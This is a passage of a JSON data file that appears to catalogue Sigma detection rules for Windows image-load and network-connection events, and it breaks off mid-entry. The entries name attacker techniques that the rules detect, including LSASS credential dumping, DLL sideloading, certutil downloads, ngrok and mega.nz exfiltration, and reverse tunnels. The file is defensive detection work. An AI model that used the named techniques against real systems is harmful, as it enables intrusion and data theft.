"2020/10/20", - "filename": "image_load_uipromptforcreds_dlls.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Other legitimate processes loading those DLLs in your environment." 
- ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", - "value": "Unsigned Image Loaded Into LSASS Process", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/10/22", - "filename": "image_load_unsigned_image_loaded_into_lsass.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Valid user connecting using RDP" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", - "value": "APT PRIVATELOG Image Load Pattern", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/09/07", - "filename": "image_load_usp_svchost_clfsw32.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Rarely observed" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "value": "VMware Xfer Loading DLL from 
Nondefault Path", - "meta": { - "refs": [ - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/02", - "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "value": "WMIC Loading Scripting Libraries", - "meta": { - "refs": [ - "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", - "https://twitter.com/dez_/status/986614411711442944", - "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1220" - ], - "creation_date": "2020/10/17", - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. 
It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", - "value": "Wmiprvse Wbemcomn DLL Hijack", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/10/12", - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects non wmiprvse loading WMI modules", - "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", - "value": "WMI Modules Loaded", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2019/08/10", - "filename": "image_load_wmi_module_load.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMI command line event consumers", - "uuid": 
"05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "value": "WMI Persistence - Command Line Event Consumer", - "meta": { - "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" - ], - "tags": [ - "attack.t1546.003", - "attack.persistence" - ], - "creation_date": "2018/03/07", - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown (data set is too small; further testing needed)" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", - "value": "Suspicious WSMAN Provider Image Loads", - "meta": { - "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", - "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", - "https://github.com/bohops/WSMan-WinRM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" - ], - "creation_date": "2020/06/24", - "filename": "image_load_wsman_provider_image_load.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable in the Windows folder accessing github.com", - "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "value": "Microsoft Binary Github Communication", - "meta": 
{ - "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" - ], - "creation_date": "2017/08/24", - "filename": "net_connection_win_binary_github_com.yml", - "author": "Michael Haag (idea), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown", - "@subTee in your network" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "value": "Microsoft Binary Suspicious Communication Endpoint", - "meta": { - "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105" - ], - "creation_date": "2018/08/30", - "filename": "net_connection_win_binary_susp_com.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a network connection intitiated by the certutil.exe tool. 
Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", - "value": "Certutil Initiated Connection", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/09/02", - "filename": "net_connection_win_certutil.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate certutil network connection" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects process connections to a Monero crypto mining pool", - "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "value": "Windows Crypto Mining Pool Connections", - "meta": { - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496" - ], - "creation_date": "2021/10/26", - "filename": "net_connection_win_crypto_mining.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of crypto miners" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "value": "Dead Drop Resolvers", - "meta": { - "refs": [ - "https://content.fireeye.com/apt-41/rpt-apt41", - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - 
"https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" - ], - "creation_date": "2022/08/17", - "filename": "net_connection_win_dead_drop_resolvers.yml", - "author": "Sorina Ionescu", - "level": "high", - "falsepositive": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects Dllhost that communicates with public IP addresses", - "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", - "value": "Dllhost Internet Connection", - "meta": { - "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" - ], - "creation_date": "2020/07/13", - "filename": "net_connection_win_dllhost_net_connections.yml", - "author": "bartblaze", - "level": "medium", - "falsepositive": [ - "Communication to other corporate systems that use IP addresses from public address spaces" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects network connections from Equation Editor", - "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", - "value": "Equation Editor Network Connection", - "meta": { - "refs": [ - "https://twitter.com/forensicitguy/status/1513538712986079238", - 
"https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203" - ], - "creation_date": "2022/04/14", - "filename": "net_connection_win_eqnedt.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "value": "Excel Network Connections", - "meta": { - "refs": [ - "https://corelight.com/blog/detecting-cve-2021-42292", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203" - ], - "creation_date": "2021/11/10", - "filename": "net_connection_win_excel_outbound_network_connection.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", - "level": "medium", - "falsepositive": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." 
- ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", - "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", - "value": "HH.EXE Network Connections", - "meta": { - "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ], - "creation_date": "2022/10/05", - "filename": "net_connection_win_hh.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", - "value": "Download a File with IMEWDBLD.exe", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", - "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/01/22", - "filename": "net_connection_win_imewdbld.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects programs that connect to typical malware back connect ports based on 
statistical analysis from two different sandbox system databases", - "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", - "value": "Suspicious Typical Malware Back Connect Ports", - "meta": { - "refs": [ - "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1571" - ], - "creation_date": "2017/03/19", - "filename": "net_connection_win_malware_backconnect_ports.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "value": "Communication To Mega.nz", - "meta": { - "refs": [ - "https://megatools.megous.com/", - "https://www.mandiant.com/resources/russian-targeting-gov-business", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.001" - ], - "creation_date": "2021/12/06", - "filename": "net_connection_win_mega_nz.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of mega.nz uploaders and tools" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "value": "Msiexec Initiated Connection", - "meta": { - "refs": [ - 
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/01/16", - "filename": "net_connection_win_msiexec.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate msiexec over networks" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "uuid": "18249279-932f-45e2-b37a-8925f2597670", - "value": "Communication To Ngrok.Io", - "meta": { - "refs": [ - "https://ngrok.com/", - "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.001" - ], - "creation_date": "2022/07/16", - "filename": "net_connection_win_ngrok_io.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of ngrok.io" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", - "value": "Communication To Ngrok Tunneling Service", - "meta": { - "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" - ], - "creation_date": "2022/11/03", - "filename": "net_connection_win_ngrok_tunnel.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of ngrok" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious network connection by Notepad", - "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", - "value": "Notepad Making Network Connection", - "meta": { - "refs": [ - "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", - "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2020/05/14", - "filename": "net_connection_win_notepad_network_connection.yml", - "author": "EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. 
extend filters with company's ip range')", - "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", - "value": "PowerShell Network Connections", - "meta": { - "refs": [ - "https://www.youtube.com/watch?v=DLtJTxMWZ2o", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/13", - "filename": "net_connection_win_powershell_network_connection.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Administrative scripts", - "Microsoft IP range" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", - "value": "Python Initiated Connection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", - "https://pypi.org/project/scapy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2021/12/10", - "filename": "net_connection_win_python.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate python script" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "value": "RDP Over Reverse SSH Tunnel", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1096148422984384514", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "creation_date": "2019/02/16", - "filename": "net_connection_win_rdp_reverse_tunnel.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", - "value": "RDP to HTTP or HTTPS Target Ports", - "meta": { - "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", - "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "creation_date": "2022/04/29", - "filename": "net_connection_win_rdp_to_http.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "value": "Regsvr32 Network Activity", - "meta": { - "refs": [ - "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", - "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" - ], - "tags": [ - 
"attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2019/10/25", - "filename": "net_connection_win_regsvr32_network_activity.yml", - "author": "Dmitriy Lifanov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "value": "Remote PowerShell Session (Network)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2019/09/12", - "filename": "net_connection_win_remote_powershell_session_network.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", - "Network Service user name of a not-covered localization" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a rundll32 that communicates with public IP addresses", - "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", - "value": "Rundll32 Internet Connection", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" - ], - "creation_date": "2017/11/04", - "filename": "net_connection_win_rundll32_net_connections.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Communication to other corporate systems that use IP addresses from public address spaces" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a script interpreter wscript/cscript opening a network connection. 
Adversaries may use script to download malicious payloads.", - "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", - "value": "Script Initiated Connection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/08/28", - "filename": "net_connection_win_script.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate scripts" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", - "value": "Script Initiated Connection to Non-Local Network", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/08/28", - "filename": "net_connection_win_script_wan.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate scripts" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible remote connections to Silenttrinity c2", - "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", - "value": "Silenttrinity Stager Msbuild Activity", - "meta": { - "refs": [ - "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.t1127.001" - ], - "creation_date": "2020/10/11", - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", - "author": "Kiran kumar s, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "uuid": "20384606-a124-4fec-acbb-8bd373728613", - "value": "Suspicious Network Connection Binary No CommandLine", - "meta": { - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/03", - "filename": "net_connection_win_susp_binary_no_cmdline.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious network connection by Cmstp", - "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "value": "Cmstp Making Network Connection", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], - "creation_date": "2022/08/30", - "filename": "net_connection_win_susp_cmstp.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - 
